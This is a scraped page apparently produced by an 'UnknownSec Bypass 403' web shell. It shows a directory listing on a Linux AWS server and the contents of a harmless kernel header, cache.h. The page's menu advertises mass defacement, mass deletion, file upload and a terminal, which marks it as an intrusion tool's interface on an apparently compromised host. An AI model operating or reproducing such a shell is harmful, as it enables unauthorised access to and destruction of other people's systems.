UnknownSec Bypass
403
:
/
lib
/
modules
/
5.15.0-1075-aws
/
build
/
arch
/
h8300
/
include
/
asm
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
cache.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef __ARCH_H8300_CACHE_H #define __ARCH_H8300_CACHE_H /* bytes per L1 cache line */ #define L1_CACHE_SHIFT 2 #define L1_CACHE_BYTES (1 << L1_CACHE_SHIFT) #define __cacheline_aligned #define ____cacheline_aligned #endif
Copyright © 2025 - UnknownSec